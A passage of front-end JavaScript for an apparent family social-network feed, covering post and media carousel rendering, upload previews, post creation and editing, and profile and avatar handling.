                                                return `<video controls preload="none" class="w-full max-h-64 md:max-h-96 ${index === 0 ? '' : 'hidden'}" data-carousel-item="${post.id}-${index}">
                                                    <source src="${item.url}">
                                                    Your browser does not support the video tag.
                                                </video>`;
                                            }
                                        }).join('')}
                                    </div>

                                    <!-- Navigation Arrows -->
                                    <button onclick="navigateCarousel(${post.id}, -1)" class="absolute left-1 sm:left-2 top-1/2 transform -translate-y-1/2 bg-black bg-opacity-50 text-white p-2 sm:p-3 rounded-full hover:bg-opacity-75 active:bg-opacity-90 transition">
                                        ${tablerIcon('chevron-left', { size: 20, className: 'sm:w-6 sm:h-6', preserveColor: true })}
                                    </button>
                                    <button onclick="navigateCarousel(${post.id}, 1)" class="absolute right-1 sm:right-2 top-1/2 transform -translate-y-1/2 bg-black bg-opacity-50 text-white p-2 sm:p-3 rounded-full hover:bg-opacity-75 active:bg-opacity-90 transition">
                                        ${tablerIcon('chevron-right', { size: 20, className: 'sm:w-6 sm:h-6', preserveColor: true })}
                                    </button>

                                    <!-- Dot Indicators -->
                                    <div class="absolute bottom-2 left-1/2 transform -translate-x-1/2 flex space-x-2">
                                        ${post.mediaUrls.map((item, index) => `
                                            <button onclick="jumpToCarouselSlide(${post.id}, ${index})" class="w-3 h-3 md:w-2 md:h-2 rounded-full transition ${index === 0 ? 'bg-white' : 'bg-white bg-opacity-50'} hover:scale-110" data-carousel-dot="${post.id}-${index}"></button>
                                        `).join('')}
                                    </div>

                                    <!-- Media Counter with Type Indicator -->
                                    <div class="absolute top-2 right-2 bg-black bg-opacity-50 text-white px-2 py-1 rounded text-sm">
                                        <span id="carousel-counter-${post.id}">1</span> / ${post.mediaUrls.length}
                                    </div>
                                </div>
                            `}
                        </div>
                    ` : post.photoUrls && post.photoUrls.length > 0 ? `
                        <div class="mt-3 mb-3 sm:mt-4 sm:mb-4 relative">
                            ${post.photoUrls.length === 1 ? `
                                <!-- Single Photo (F23: see mediaUrls single
                                     comment above for w-auto rationale). -->
                                <img src="${post.photoUrls[0]}" alt="Post photo" class="block w-auto max-w-full max-h-80 md:max-h-96 mx-auto rounded-lg cursor-zoom-in" loading="lazy" onclick="openFeedPhotoLightbox(${post.id}, 0)" onerror="_imgFallback(this, 'photo')">
                            ` : `
                                <!-- Multiple Photos Carousel -->
                                <div id="carousel-${post.id}" class="relative">
                                    <div class="rounded-lg bg-gray-100 min-h-60 md:min-h-80">
                                        ${post.photoUrls.map((url, index) => `
                                            <img src="${url}" alt="Photo ${index + 1}" class="w-full max-h-80 md:max-h-96 object-contain cursor-zoom-in ${index === 0 ? '' : 'hidden'}" data-carousel-item="${post.id}-${index}" loading="lazy" onclick="openFeedPhotoLightbox(${post.id}, ${index})" onerror="_imgFallback(this, 'photo')">
                                        `).join('')}
                                    </div>

                                    <!-- Navigation Arrows -->
                                    ${post.photoUrls.length > 1 ? `
                                        <button onclick="navigateCarousel(${post.id}, -1)" class="absolute left-1 sm:left-2 top-1/2 transform -translate-y-1/2 bg-black bg-opacity-50 text-white p-2 sm:p-3 rounded-full hover:bg-opacity-75 active:bg-opacity-90 transition">
                                            ${tablerIcon('chevron-left', { size: 20, className: 'sm:w-6 sm:h-6', preserveColor: true })}
                                        </button>
                                        <button onclick="navigateCarousel(${post.id}, 1)" class="absolute right-1 sm:right-2 top-1/2 transform -translate-y-1/2 bg-black bg-opacity-50 text-white p-2 sm:p-3 rounded-full hover:bg-opacity-75 active:bg-opacity-90 transition">
                                            ${tablerIcon('chevron-right', { size: 20, className: 'sm:w-6 sm:h-6', preserveColor: true })}
                                        </button>

                                        <!-- Dot Indicators -->
                                        <div class="absolute bottom-2 left-1/2 transform -translate-x-1/2 flex space-x-2">
                                            ${post.photoUrls.map((_, index) => `
                                                <button onclick="jumpToCarouselSlide(${post.id}, ${index})" class="w-3 h-3 md:w-2 md:h-2 rounded-full transition ${index === 0 ? 'bg-white' : 'bg-white bg-opacity-50'} hover:scale-110" data-carousel-dot="${post.id}-${index}"></button>
                                            `).join('')}
                                        </div>

                                        <!-- Photo Counter -->
                                        <div class="absolute top-2 right-2 bg-black bg-opacity-50 text-white px-2 py-1 rounded text-sm">
                                            <span id="carousel-counter-${post.id}">1</span> / ${post.photoUrls.length}
                                        </div>
                                    ` : ''}
                                </div>
                            `}
                        </div>
                    ` : ''}

                    <!-- Video Attachment -->
                    ${post.videoUrl ? `
                        <div class="mt-3 mb-3 sm:mt-4 sm:mb-4">
                            <video controls preload="metadata" class="w-full rounded-lg bg-black max-h-64 md:max-h-96">
                                <source src="${post.videoUrl}" type="video/mp4">
                                <source src="${post.videoUrl}" type="video/quicktime">
                                <source src="${post.videoUrl}" type="video/webm">
                                Your browser does not support the video tag.
                            </video>
                        </div>
                    ` : ''}

                    <!-- Like and Comment Actions -->
                    <div class="flex items-center pt-3 sm:pt-4 space-x-3 sm:space-x-6 border-t border-gray-200">
                        <button onclick="toggleLike(${post.id}, ${userLiked})" class="flex items-center space-x-1.5 sm:space-x-2 transition-colors hover:text-primary ${likeButtonClass} py-2 px-3 md:py-1 md:px-2 -ml-3 md:-ml-2 rounded-lg active:bg-gray-100">
                            <span class="text-xl sm:text-xl">${likeIcon}</span>
                            <span id="like-count-${post.id}" class="text-sm sm:text-sm font-medium">${likeCount}</span>
                        </button>
                        <button onclick="toggleComments(${post.id})" class="flex items-center space-x-1.5 sm:space-x-2 text-gray-500 transition-colors hover:text-primary py-2 px-3 md:py-1 md:px-2 rounded-lg active:bg-gray-100">
                            <span class="text-xl sm:text-xl">💬</span>
                            <span class="text-sm sm:text-sm font-medium">${commentCount} ${commentCount === 1 ? 'Comment' : 'Comments'}</span>
                        </button>
                    </div>

                    <!-- Comments Section (hidden by default) -->
                    <div id="comments-section-${post.id}" class="hidden pt-4 mt-4 border-t border-gray-200">
                        <div id="comments-list-${post.id}" class="mb-4 space-y-3">
                            <p class="text-sm text-center text-gray-500">Loading comments...</p>
                        </div>

                        <!-- Add Comment Form -->
                        <form onsubmit="handleAddComment(event, ${post.id}); return false;" class="flex space-x-2">
                            <div class="flex-1 flex gap-2 relative">
                                <input type="text" id="comment-input-${post.id}" placeholder="Write a comment..." required
                                    class="flex-1 px-3 py-2 text-sm border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                <button type="button" onclick="showEmojiPickerForInput('comment-input-${post.id}', this)"
                                    class="px-3 py-2 text-lg border border-gray-300 rounded-md hover:bg-gray-100 transition-colors"
                                    title="Add emoji">
                                    😀
                                </button>
                            </div>
                            <button type="submit" class="px-4 py-2 text-sm font-semibold text-white rounded-md bg-primary hover:bg-opacity-90">Post</button>
                        </form>
                    </div>
                </div>
            `;
        }

        async function fetchAndRenderBirthdays() {
            const birthdaysContainer = document.getElementById('birthdays-container');
            if (!birthdaysContainer) return;

            try {
                const birthdays = await apiFetch(`${API_BASE_URL}/posts/on-this-day`);
                if (birthdays.length > 0) {
                    birthdaysContainer.innerHTML = birthdays.map(b => `
                        <div class="p-4 mb-4 border-l-4 rounded-md bg-blue-50 border-primary">
                            <p class="font-semibold text-gray-800">🎂 ${b.message}</p>
                        </div>
                    `).join('');
                } else {
                    birthdaysContainer.innerHTML = '';
                }
            } catch (error) {
                console.error("Could not load birthdays:", error);
                birthdaysContainer.innerHTML = '';
            }
        }

        // Store selected files globally
        let selectedPhotos = [];
        let selectedVideo = null;
        let selectedMixedMedia = [];  // New: for mixed photos and videos
        let currentMediaType = 'photos';  // 'photos' or 'video'

        function selectMediaType(type) {
            currentMediaType = type;

            const photosBtn = document.getElementById('select-photos-btn');
            const videoBtn = document.getElementById('select-video-btn');
            const photosSection = document.getElementById('photos-upload-section');
            const videoSection = document.getElementById('video-upload-section');

            if (type === 'photos') {
                // Clear video if switching
                clearVideo();

                // Update UI
                photosBtn.classList.add('bg-primary', 'text-white');
                photosBtn.classList.remove('hover:bg-gray-50');
                videoBtn.classList.remove('bg-primary', 'text-white');
                videoBtn.classList.add('hover:bg-gray-50');

                photosSection.classList.remove('hidden');
                videoSection.classList.add('hidden');
            } else {
                // Clear photos if switching
                clearAllPhotos();

                // Update UI
                videoBtn.classList.add('bg-primary', 'text-white');
                videoBtn.classList.remove('hover:bg-gray-50');
                photosBtn.classList.remove('bg-primary', 'text-white');
                photosBtn.classList.add('hover:bg-gray-50');

                videoSection.classList.remove('hidden');
                photosSection.classList.add('hidden');
            }
        }

        function handleMultiplePhotosPreview(event) {
            const files = Array.from(event.target.files);
            if (files.length === 0) return;

            // Limit to 10 photos
            if (files.length > 10) {
                alert('Maximum 10 photos allowed per post');
                event.target.value = '';
                return;
            }

            selectedPhotos = files;
            renderPhotosPreviews();
        }

        function renderPhotosPreviews() {
            const previewContainer = document.getElementById('photos-preview-container');
            const previewGrid = document.getElementById('photos-preview-grid');

            if (selectedPhotos.length === 0) {
                previewContainer.classList.add('hidden');
                return;
            }

            previewGrid.innerHTML = '';
            previewContainer.classList.remove('hidden');

            selectedPhotos.forEach((file, index) => {
                const reader = new FileReader();
                reader.onload = function(e) {
                    const photoDiv = document.createElement('div');
                    photoDiv.className = 'relative group';
                    photoDiv.innerHTML = `
                        <img src="${e.target.result}" alt="Preview ${index + 1}" class="object-cover w-full h-24 rounded-md">
                        <button type="button" onclick="removePhoto(${index})" class="absolute top-1 right-1 p-1 text-white bg-red-500 rounded-full opacity-0 group-hover:opacity-100 transition-opacity">
                            ${tablerIcon('x', { size: 16, preserveColor: true })}
                        </button>
                    `;
                    previewGrid.appendChild(photoDiv);
                };
                reader.readAsDataURL(file);
            });
        }

        function removePhoto(index) {
            selectedPhotos.splice(index, 1);
            renderPhotosPreviews();

            // Update file input (tricky because we can't directly modify FileList)
            // We'll handle this in form submission
        }

        function clearAllPhotos() {
            selectedPhotos = [];
            const photosInput = document.getElementById('post-photos');
            if (photosInput) {
                photosInput.value = '';
            }
            const previewContainer = document.getElementById('photos-preview-container');
            if (previewContainer) {
                previewContainer.classList.add('hidden');
            }
            const previewGrid = document.getElementById('photos-preview-grid');
            if (previewGrid) {
                previewGrid.innerHTML = '';
            }
        }

        function handleVideoPreview(event) {
            const file = event.target.files[0];
            if (!file) return;

            // Validate file size (100MB)
            const maxSize = 100 * 1024 * 1024; // 100MB in bytes
            if (file.size > maxSize) {
                alert('Video file is too large. Maximum size is 100MB.');
                event.target.value = '';
                return;
            }

            // Validate file type
            const allowedTypes = ['video/mp4', 'video/quicktime', 'video/webm', 'video/x-msvideo', 'video/avi'];
            if (!allowedTypes.includes(file.type)) {
                alert('Invalid video format. Please use MP4, MOV, WebM, or AVI.');
                event.target.value = '';
                return;
            }

            selectedVideo = file;

            // Show preview
            const previewContainer = document.getElementById('video-preview-container');
            const videoPreview = document.getElementById('video-preview');

            const videoURL = URL.createObjectURL(file);
            videoPreview.src = videoURL;
            previewContainer.classList.remove('hidden');
        }

        function clearVideo() {
            selectedVideo = null;
            const videoInput = document.getElementById('post-video');
            if (videoInput) {
                videoInput.value = '';
            }
            const previewContainer = document.getElementById('video-preview-container');
            if (previewContainer) {
                previewContainer.classList.add('hidden');
            }
            const videoPreview = document.getElementById('video-preview');
            if (videoPreview) {
                videoPreview.src = '';
            }
        }

        // Mixed Media Functions (Phase 2)
        function handleMixedMediaPreview(event) {
            const files = Array.from(event.target.files);
            if (files.length === 0) return;

            // Check if adding these files would exceed the limit
            const totalFiles = selectedMixedMedia.length + files.length;
            if (totalFiles > 10) {
                alert(`Maximum 10 media items allowed per post. You currently have ${selectedMixedMedia.length} item(s). You can add ${10 - selectedMixedMedia.length} more.`);
                event.target.value = '';
                return;
            }

            // Validate each file
            for (const file of files) {
                if (file.type.startsWith('video/')) {
                    // Check video size (100MB)
                    if (file.size > 100 * 1024 * 1024) {
                        alert(`Video "${file.name}" is too large. Maximum size is 100MB.`);
                        event.target.value = '';
                        return;
                    }
                }
            }

            // Append new files to existing selection
            selectedMixedMedia = [...selectedMixedMedia, ...files];

            // Clear the input so the same files can be selected again if needed
            event.target.value = '';

            renderMixedMediaPreviews();
        }

        function renderMixedMediaPreviews() {
            const previewContainer = document.getElementById('media-preview-container');
            const previewGrid = document.getElementById('media-preview-grid');

            if (selectedMixedMedia.length === 0) {
                previewContainer.classList.add('hidden');
                return;
            }

            previewGrid.innerHTML = '';
            previewContainer.classList.remove('hidden');

            selectedMixedMedia.forEach((file, index) => {
                const isVideo = file.type.startsWith('video/');
                const mediaDiv = document.createElement('div');
                mediaDiv.className = 'relative group';

                if (isVideo) {
                    // Generate video thumbnail
                    const videoURL = URL.createObjectURL(file);

                    // Create hidden video element to capture thumbnail
                    const video = document.createElement('video');
                    video.preload = 'metadata';
                    video.muted = true;
                    video.playsInline = true;
                    video.src = videoURL;

                    video.onloadeddata = function() {
                        // Seek to 1 second (or first frame if video is shorter)
                        video.currentTime = Math.min(1, video.duration / 2);
                    };

                    video.onseeked = function() {
                        // Create canvas to capture frame
                        const canvas = document.createElement('canvas');
                        canvas.width = video.videoWidth;
                        canvas.height = video.videoHeight;

                        const ctx = canvas.getContext('2d');
                        ctx.drawImage(video, 0, 0, canvas.width, canvas.height);

                        // Convert to data URL
                        const thumbnailURL = canvas.toDataURL('image/jpeg', 0.8);

                        // Display thumbnail with play icon overlay
                        mediaDiv.innerHTML = `
                            <img src="${thumbnailURL}" alt="Video preview ${index + 1}" class="object-cover w-full h-24 rounded-md bg-black">
                            <div class="absolute inset-0 flex items-center justify-center bg-black bg-opacity-30 rounded-md pointer-events-none">
                                ${tablerIcon('play', { size: 32, preserveColor: true })}
                            </div>
                            <button type="button" onclick="removeMixedMedia(${index})" class="absolute top-1 right-1 p-1 text-white bg-red-500 rounded-full opacity-0 group-hover:opacity-100 transition-opacity z-10">
                                ${tablerIcon('x', { size: 16, preserveColor: true })}
                            </button>
                        `;

                        // Clean up
                        URL.revokeObjectURL(videoURL);
                    };

                    video.onerror = function() {
                        // Fallback to icon if thumbnail generation fails
                        mediaDiv.innerHTML = `
                            <div class="w-full h-24 rounded-md bg-gray-800 flex items-center justify-center">
                                <span class="text-white text-2xl">🎥</span>
                            </div>
                            <button type="button" onclick="removeMixedMedia(${index})" class="absolute top-1 right-1 p-1 text-white bg-red-500 rounded-full opacity-0 group-hover:opacity-100 transition-opacity">
                                ${tablerIcon('x', { size: 16, preserveColor: true })}
                            </button>
                        `;
                        URL.revokeObjectURL(videoURL);
                    };
                } else {
                    // Photo preview
                    const reader = new FileReader();
                    reader.onload = function(e) {
                        mediaDiv.innerHTML = `
                            <img src="${e.target.result}" alt="Preview ${index + 1}" class="object-cover w-full h-24 rounded-md">
                            <button type="button" onclick="removeMixedMedia(${index})" class="absolute top-1 right-1 p-1 text-white bg-red-500 rounded-full opacity-0 group-hover:opacity-100 transition-opacity">
                                ${tablerIcon('x', { size: 16, preserveColor: true })}
                            </button>
                        `;
                    };
                    reader.readAsDataURL(file);
                }

                previewGrid.appendChild(mediaDiv);
            });
        }

        function removeMixedMedia(index) {
            selectedMixedMedia.splice(index, 1);
            renderMixedMediaPreviews();
        }

        function clearAllMedia() {
            selectedMixedMedia = [];
            const mediaInput = document.getElementById('post-media');
            if (mediaInput) {
                mediaInput.value = '';
            }
            const previewContainer = document.getElementById('media-preview-container');
            if (previewContainer) {
                previewContainer.classList.add('hidden');
            }
            const previewGrid = document.getElementById('media-preview-grid');
            if (previewGrid) {
                previewGrid.innerHTML = '';
            }
        }

        async function handleCreatePost(event) {
            event.preventDefault();
            const errorDiv = document.getElementById('create-post-error');
            errorDiv.textContent = '';

            try {
                const content = document.getElementById('post-content').value.trim();
                const privacy = document.getElementById('post-privacy').value;
                const commentPermission = document.getElementById('post-comment-permission').value;

                if (!content) {
                    throw new Error("Please write something to share.");
                }

                // Check if there are photos or video
                const hasPhotos = selectedPhotos.length > 0;
                const hasVideo = selectedVideo !== null;
                const hasMixedMedia = selectedMixedMedia.length > 0;

                if (hasMixedMedia) {
                    // Use FormData for mixed media uploads
                    const formData = new FormData();
                    formData.append('content', content);
                    formData.append('privacy', privacy);
                    formData.append('commentPermission', commentPermission);
                    formData.append('type', 'user_post');

                    // Show uploading progress
                    const progressContainer = document.getElementById('media-upload-progress');
                    if (progressContainer) {
                        progressContainer.classList.remove('hidden');
                    }

                    // Disable submit button during upload
                    const submitButton = event.target.querySelector('button[type="submit"]');
                    const originalText = submitButton.textContent;
                    submitButton.disabled = true;
                    submitButton.textContent = 'Uploading media...';

                    // Append each media file
                    selectedMixedMedia.forEach(file => {
                        formData.append('media', file);
                    });

                    // Upload mixed media
                    await apiFetch(`${API_BASE_URL}/posts`, {
                        method: 'POST',
                        body: formData
                    });

                    // Re-enable submit button
                    submitButton.disabled = false;
                    submitButton.textContent = originalText;

                    if (progressContainer) {
                        progressContainer.classList.add('hidden');
                    }
                } else if (hasPhotos || hasVideo) {
                    // Use FormData for media uploads
                    const formData = new FormData();
                    formData.append('content', content);
                    formData.append('privacy', privacy);
                    formData.append('commentPermission', commentPermission);
                    formData.append('type', 'user_post');

                    if (hasVideo) {
                        // Append video
                        formData.append('video', selectedVideo);

                        // Show uploading message for video
                        const progressContainer = document.getElementById('video-upload-progress');

                        if (progressContainer) {
                            progressContainer.classList.remove('hidden');
                            // Simulate progress with animation
                            const progressBar = document.getElementById('progress-bar');
                            if (progressBar) {
                                progressBar.style.width = '50%';
                                progressBar.classList.add('animate-pulse');
                            }
                        }

                        // Disable submit button during upload
                        const submitButton = event.target.querySelector('button[type="submit"]');
                        const originalText = submitButton.textContent;
                        submitButton.disabled = true;
                        submitButton.textContent = 'Uploading video...';

                        // Use apiFetch which properly handles CORS and auth
                        await apiFetch(`${API_BASE_URL}/posts`, {
                            method: 'POST',
                            body: formData
                        });

                        // Re-enable submit button
                        submitButton.disabled = false;
                        submitButton.textContent = originalText;

                        if (progressContainer) {
                            progressContainer.classList.add('hidden');
                        }
                    } else {
                        // Append photos
                        selectedPhotos.forEach(photo => {
                            formData.append('photos', photo);
                        });

                        await apiFetch(`${API_BASE_URL}/posts`, {
                            method: 'POST',
                            body: formData
                        });
                    }
                } else {
                    // Use JSON for text-only posts
                    await apiFetch(`${API_BASE_URL}/posts`, {
                        method: 'POST',
                        body: { content, privacy, commentPermission, type: 'user_post' }
                    });
                }

                // Clear form data BEFORE closing modal (so elements still exist in DOM)
                clearAllPhotos();
                clearVideo();
                clearAllMedia();
                document.getElementById('create-post-form').reset();

                // Now close the modal
                closeModal('create-post-modal');

                // Suppress the 30s new-posts monitor for our own post — kept
                // true across the entire polling flow (previously turned off
                // via setTimeout(10s) which could race with a cold-start
                // create flow and cause the "New posts available" pill to
                // flash for the user's own post).
                justPosted = true;

                // Compact top-of-feed "Posting…" indicator (no full-feed
                // wipe). Session 2 fix: the previous behaviour set
                // feed-container.innerHTML which blew away every unrelated
                // card and then followed up with fetchAndRenderFeed(true)
                // that showed skeleton loaders — a full page-level flash
                // for a single-row insertion.
                const feedContainer = document.getElementById('feed-container');
                let postingIndicator = null;
                if (feedContainer) {
                    postingIndicator = document.createElement('div');
                    postingIndicator.id = 'ebw-posting-indicator';
                    postingIndicator.className = 'ebw-posting-indicator';
                    postingIndicator.innerHTML = `
                        <span class="ebw-post-delete-spinner" aria-hidden="true"></span>
                        <span>Posting…</span>
                    `;
                    feedContainer.prepend(postingIndicator);
                }

                // Diff-and-prepend: fetch the top slice of the feed and
                // find any post IDs not currently in the DOM. Prepend those.
                //
                // - `limit=1` was wrong because the feed sorts pinned posts
                //   first: the newly-created (non-pinned) post won't be
                //   posts[0] if any pinned post exists, and the watermark
                //   check (newestPostTime > beforePostTimestamp) never
                //   advances. limit=10 gives us pinned + up to ~9 recents.
                // - `?_=<ts>` cache-busts the browser HTTP cache — Cloud Run
                //   doesn't send strict no-store, so a repeated
                //   /feed?offset=0&limit=... URL can come back stale after
                //   a mutation.
                const existingIds = new Set(
                    Array.from(document.querySelectorAll('[data-post-id]'))
                        .map(n => parseInt(n.getAttribute('data-post-id'), 10))
                        .filter(Number.isFinite)
                );
                const startTime = Date.now();
                const maxWaitTime = 8000;
                let newPosts = [];
                let attemptCount = 0;

                while (newPosts.length === 0 && (Date.now() - startTime) < maxWaitTime) {
                    if (attemptCount > 0) {
                        await new Promise(resolve => setTimeout(resolve, 1000));
                    }
                    attemptCount++;
                    try {
                        const response = await apiFetch(
                            `${API_BASE_URL}/feed?offset=0&limit=10&_=${Date.now()}`
                        );
                        const posts = response.posts || response;
                        newPosts = posts.filter(p => !existingIds.has(p.id));
                    } catch (err) {
                        console.error("Error checking for new post:", err);
                        break;
                    }
                }

                // Remove the "Posting…" indicator before we insert the card.
                if (postingIndicator) postingIndicator.remove();

                if (newPosts.length > 0 && feedContainer) {
                    // Insert AFTER the top cultural-doodle card if one is
                    // present (fetchAndRenderFeed(reset=true) always renders
                    // a data-culture-card="0" at index 0). Prepending before
                    // it would put the user's new post above "Family Wisdom"
                    // and friends — reads awkwardly. Falls back to a plain
                    // prepend if no top card is present.
                    const topCultureCard = feedContainer.querySelector('[data-culture-card="0"]');
                    // Reverse so the newest ends up at the very top of the
                    // insertion region (handles concurrent posters).
                    newPosts.slice().reverse().forEach((p) => {
                        const wrapper = document.createElement('div');
                        wrapper.innerHTML = renderFeedPost(p);
                        const cardNode = wrapper.firstElementChild;
                        if (!cardNode) return;
                        if (topCultureCard && topCultureCard.parentNode === feedContainer) {
                            topCultureCard.insertAdjacentElement('afterend', cardNode);
                        } else {
                            feedContainer.prepend(cardNode);
                        }
                    });
                    // Update the monitor's watermark so the next 30s poll
                    // doesn't treat these posts as new.
                    const maxCreated = Math.max(
                        latestPostTimestamp || 0,
                        ...newPosts.map(p => new Date(p.createdAt).getTime())
                    );
                    latestPostTimestamp = maxCreated;
                } else if (feedContainer) {
                    // Fallback: full re-fetch only if we never saw the new
                    // post (backend consistency lag beyond the 8s window).
                    console.log("New post not detected within timeout, refreshing anyway");
                    await fetchAndRenderFeed(true, true);
                }

                // Small buffer after we've prepended before letting the
                // monitor fire again.
                setTimeout(() => { justPosted = false; }, 2000);
            } catch (error) {
                console.error("Error creating post:", error);
                errorDiv.textContent = error.message;
                // Also lift the posting indicator if we injected one before
                // the error surfaced.
                document.getElementById('ebw-posting-indicator')?.remove();
                justPosted = false;
            }
        }

        function openEditPostModal(post) {
            const modalContainer = document.getElementById('modal-container');
            modalContainer.innerHTML += EditPostModal(post);
            openModal('edit-post-modal');
        }

        async function handleEditPost(event, postId) {
            event.preventDefault();
            const errorDiv = document.getElementById('edit-post-error');
            errorDiv.textContent = '';
            errorDiv.classList.add('hidden');

            try {
                const content = document.getElementById('edit-post-content').value.trim();
                const privacy = document.getElementById('edit-post-privacy').value;
                const commentPermission = document.getElementById('edit-post-comment-permission').value;

                if (!content) {
                    throw new Error("Post content cannot be empty");
                }

                await apiFetch(`${API_BASE_URL}/posts/${postId}`, {
                    method: 'PUT',
                    body: { content, privacy, commentPermission }
                });

                closeModal('edit-post-modal');
                await fetchAndRenderFeed(true, true); // Force refresh after edit
            } catch (error) {
                console.error("Error editing post:", error);
                errorDiv.textContent = error.message;
                errorDiv.classList.remove('hidden');
            }
        }

        // Profile editing functions
        let selectedAvatarFile = null;

        async function loadUserAvatar() {
            try {
                // Add cache-busting parameter to ensure fresh data
                const timestamp = Date.now();
                const response = await apiFetch(`${API_BASE_URL}/me?_=${timestamp}`);
                const userData = response.user || response; // Handle nested user object
                const headerAvatar = document.getElementById('header-avatar');

                console.log('Loading user avatar:', userData.avatarSignedUrl ? 'Avatar found' : 'No avatar uploaded');
                console.log('Header avatar element:', headerAvatar ? 'Found' : 'NOT FOUND');

                if (headerAvatar) {
                    if (userData.avatarSignedUrl) {
                        console.log('Setting avatar in header to:', userData.avatarSignedUrl.substring(0, 50) + '...');
                        // onerror restores the default Tabler user-circle
                        // icon inline so a broken image never shows.
                        headerAvatar.innerHTML = `<img src="${userData.avatarSignedUrl}" class="w-full h-full object-cover" alt="Avatar" onerror="this.parentElement.innerHTML = &quot;${tablerIcon('user-circle', { size: 20 }).replace(/"/g, '&quot;')}&quot;">`;
                    } else {
                        // Keep default icon if no avatar uploaded
                        console.log('User has not uploaded an avatar yet');
                    }
                } else {
                    console.error('header-avatar element not found in DOM');
                }

                // Store user data in appState for later use
                appState.currentUserData = userData;
            } catch (error) {
                console.error("Error loading user avatar:", error);
            }
        }

        async function openEditProfileModal() {
            try {
                // Fetch current user data. Cache-bust so a recent save isn't
                // overwritten by an older browser-cached /me response when the
                // form re-pre-populates and the user submits again.
                const response = await apiFetch(`${API_BASE_URL}/me?_=${Date.now()}`);
                const userData = response.user || response; // Handle nested user object

                // Open the modal
                openModal('edit-profile-modal');

                // Populate the form with current data
                document.getElementById('profile-first-name').value = userData.firstName || '';
                document.getElementById('profile-middle-name').value = userData.middleName || '';
                document.getElementById('profile-last-name').value = userData.lastName || '';
                document.getElementById('profile-suffix').value = userData.suffix || '';
                document.getElementById('profile-bio').value = userData.bio || '';

                // B44: pre-populate DOB. GET /me surfaces birthYear/Month/Day
                // from the User node OR (for legacy users) from the linked
                // Person via REPRESENTS.
                document.getElementById('profile-birth-year').value = userData.birthYear || '';
                document.getElementById('profile-birth-month').value = userData.birthMonth || '';
                document.getElementById('profile-birth-day').value = userData.birthDay || '';

                // Split birth place if it exists (for backward compatibility)
                const birthPlaceParts = (userData.birthPlace || '').split(',').map(s => s.trim());
                document.getElementById('profile-birth-city').value = userData.birthCity || birthPlaceParts[0] || '';
                document.getElementById('profile-birth-state').value = userData.birthState || birthPlaceParts[1] || '';
                document.getElementById('profile-birth-country').value = userData.birthCountry || birthPlaceParts[2] || '';

                document.getElementById('profile-current-location').value = userData.currentLocation || '';
                document.getElementById('profile-occupation').value = userData.occupation || '';
                document.getElementById('profile-languages').value = userData.languages || '';
                document.getElementById('profile-ethnic-group').value = userData.ethnicGroup || '';
                document.getElementById('profile-tribe').value = userData.tribe || '';
                document.getElementById('profile-hometown').value = userData.hometown || '';

                // Display current avatar if available
                if (userData.avatarSignedUrl) {
                    const avatarPreview = document.getElementById('avatar-preview');
                    avatarPreview.innerHTML = `<img src="${userData.avatarSignedUrl}" class="w-full h-full object-cover">`;
                }

                // Reset selected avatar file
                selectedAvatarFile = null;
            } catch (error) {
                console.error("Error loading profile:", error);
                alert("Error loading profile: " + error.message);
            }
        }

        function handleAvatarPreview(event) {
            const file = event.target.files[0];
            if (!file) return;

            // Validate file type
            const allowedTypes = ['image/jpeg', 'image/jpg', 'image/png', 'image/gif', 'image/webp'];
            if (!allowedTypes.includes(file.type)) {
                alert('Invalid file type. Please upload JPG, PNG, GIF, or WebP.');
                return;
            }

            // Validate file size (5MB max)
            if (file.size > 5 * 1024 * 1024) {
                alert('File too large. Maximum size is 5MB.');
                return;
            }

            // Store the file for upload
            selectedAvatarFile = file;

            // Show preview
            const reader = new FileReader();
            reader.onload = function(e) {
                const avatarPreview = document.getElementById('avatar-preview');
                avatarPreview.innerHTML = `<img src="${e.target.result}" class="w-full h-full object-cover">`;
            };
            reader.readAsDataURL(file);
        }

        async function handleSaveProfile(event) {
            event.preventDefault();

            try {
                // Upload avatar if a new one was selected
                if (selectedAvatarFile) {
                    const formData = new FormData();
                    formData.append('avatar', selectedAvatarFile);

                    await apiFetch(`${API_BASE_URL}/me/avatar`, {
                        method: 'POST',
                        body: formData
                    });
                }

                // Update profile fields
                // Combine birth place fields
                const birthCity = document.getElementById('profile-birth-city').value.trim();
                const birthState = document.getElementById('profile-birth-state').value.trim();
                const birthCountry = document.getElementById('profile-birth-country').value.trim();
                const birthPlaceParts = [birthCity, birthState, birthCountry].filter(Boolean);
                const birthPlace = birthPlaceParts.length > 0 ? birthPlaceParts.join(', ') : '';

                // B44: parse DOB fields. Stored as integers (matches Person
                // schema). Blanks remain blanks; we only send the field when
                // it's a valid integer so cleared fields don't accidentally
                // overwrite valid data with 0.
                const birthYearRaw = document.getElementById('profile-birth-year').value.trim();
                const birthMonthRaw = document.getElementById('profile-birth-month').value.trim();
                const birthDayRaw = document.getElementById('profile-birth-day').value.trim();
                const birthYearInt = birthYearRaw ? parseInt(birthYearRaw, 10) : null;
                const birthMonthInt = birthMonthRaw ? parseInt(birthMonthRaw, 10) : null;
                const birthDayInt = birthDayRaw ? parseInt(birthDayRaw, 10) : null;

                const profileData = {
                    firstName: document.getElementById('profile-first-name').value.trim(),
                    middleName: document.getElementById('profile-middle-name').value.trim(),
                    lastName: document.getElementById('profile-last-name').value.trim(),
                    suffix: document.getElementById('profile-suffix').value.trim(),
                    bio: document.getElementById('profile-bio').value.trim(),
                    birthYear: birthYearInt,
                    birthMonth: birthMonthInt,
                    birthDay: birthDayInt,
                    birthPlace: birthPlace,
                    birthCity: birthCity,
                    birthState: birthState,
                    birthCountry: birthCountry,
                    currentLocation: document.getElementById('profile-current-location').value.trim(),
                    occupation: document.getElementById('profile-occupation').value.trim(),
                    languages: document.getElementById('profile-languages').value.trim(),
                    ethnicGroup: document.getElementById('profile-ethnic-group').value.trim(),
                    tribe: document.getElementById('profile-tribe').value.trim(),
                    hometown: document.getElementById('profile-hometown').value.trim()
                };

                // Send ALL form fields (including empty strings) so the user
                // can CLEAR a field and have it persist. The form displays
                // every editable User field, so sending each one is safe —
                // empty value means "user intentionally cleared this." DOB
                // integers are the exception (parse may yield null/NaN; we
                // still drop those to avoid overwriting valid year/month/day
                // with garbage). Previously the `value !== ''` filter silently
                // ate all clear-attempts on optional text fields.
                const updateData = {};
                for (const [key, value] of Object.entries(profileData)) {
                    if (key === 'birthYear' || key === 'birthMonth' || key === 'birthDay') {
                        if (value !== null && !Number.isNaN(value)) {
                            updateData[key] = value;
                        }
                    } else {
                        updateData[key] = value;
                    }
                }

                if (Object.keys(updateData).length > 0) {
                    await apiFetch(`${API_BASE_URL}/me`, {
                        method: 'PUT',
